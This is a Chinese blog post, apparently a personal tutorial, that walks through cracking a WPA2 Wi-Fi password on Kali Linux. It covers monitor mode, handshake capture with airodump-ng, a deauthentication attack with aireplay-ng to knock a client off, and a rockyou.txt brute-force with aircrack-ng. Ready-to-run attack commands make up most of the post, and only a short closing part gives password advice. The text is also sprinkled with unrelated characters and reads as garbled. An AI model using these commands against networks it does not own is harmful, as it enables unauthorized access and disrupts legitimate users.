最近一直用flask寫自己的博客框架,等過段時間才能將其分享出來风罩,所以在此期間決定開個無線安全的專題糠排,分享一些無線安全方面的知識。(我的新書《Python爬蟲開發(fā)與項目實戰(zhàn)》發(fā)布了超升,大家在這里可以看到樣章)
好了入宦,廢話不多說,咱們進入今天的主題室琢,使用kali linux上的無線安全工具對wpa加密的wifi進行密碼破解亿胸。由于現(xiàn)在wep加密太少了,所以直接略過揩懒,選擇破解wpa佳窑。WPA破解是通過截獲客戶端和路由器之間的握手包,根據(jù)字典的大小進行暴力破解雹熬,也就是說字典的大小直接決定了破解的成功與否宽菜。
操作系統(tǒng):kali linux , 硬件:無線網(wǎng)卡 WN722N
(1)打開終端:1.輸入ifconfig,查看無線網(wǎng)卡是否加載了
2.輸入:airmon-ng start wlan3,將網(wǎng)絡(luò)啟動為監(jiān)聽模式
3.輸入:airodump-ng wlan3mon監(jiān)聽網(wǎng)絡(luò)數(shù)據(jù)包 ,如果出現(xiàn)以下錯誤竿报,繼續(xù)執(zhí)行圖中代碼铅乡。
繼續(xù)輸入:airodump-ng wlan3mon,會出現(xiàn)監(jiān)聽界面烈菌。
從監(jiān)聽界面中我們可以看到這個wifi的mac地址8C:AB:8E:A9:CB:60阵幸,加密方式:WPA2,所在的信道1.
這個wifi現(xiàn)在有一個客戶端正在進行連接芽世。接下來開始抓包挚赊,抓取握手包。
4.輸入airodump-ng -c 1 --bssid8C:AB:8E:A9:CB:60 -w phi wlan3mon
-c:指定信道 --bssid:指定wifi mac -w:指定抓取的數(shù)據(jù)包存儲的文件
5:這時候我們需要再開啟一個終端進行取消驗證攻擊济瓢,迫使這個已經(jīng)連上的客戶端斷開荠割。
這樣當客戶端自動連接的時候,就可以抓取這個握手包了。
在新的終端中執(zhí)行:aireplay-ng -0 3 -a 8C:AB:8E:A9:CB:60 -c 70:1A:04:B7:1A:90 wlan3mon
-0:指定為取消驗證攻擊 3:攻擊次數(shù) -a:指定ap的mac -c:指定客戶端的mac
6:執(zhí)行完之后,過一會就會看到監(jiān)聽到了握手包蔑鹦。
7:既然抓到了握手包夺克,Ctrl+C停止抓包。使用aircrack-ng進行暴力破解嚎朽。
在終端中輸入:aircrack-ng -w /usr/share/wordlists/rockyou.txt phi-01.cap
-w:指定破解用的密碼字典 phi-01.cap:這個是之前抓取握手包的數(shù)據(jù)包
大約過了5分鐘铺纽,爆破成功.出現(xiàn)了KEY FOUND后面的中括號中就是密碼。
(2)總結(jié):
1.由于WPA破解是采用暴力破解的方式(路由器沒有開啟wps)哟忍,字典越大狡门,破解的可能性越大。所以大家盡量設(shè)置復(fù)雜的密碼魁索,多位數(shù)+字母融撞。
2.很多人采取隱藏SSID,不暴露wifi名稱的方式來防止被破解粗蔚,事實并沒有什么用尝偎,因為整個破解過程中并不需要知道你的wifi名稱。
今天的分享就到這里鹏控,下一篇繼續(xù)分析致扯。如果大家覺得還可以呀,記得推薦呦当辐。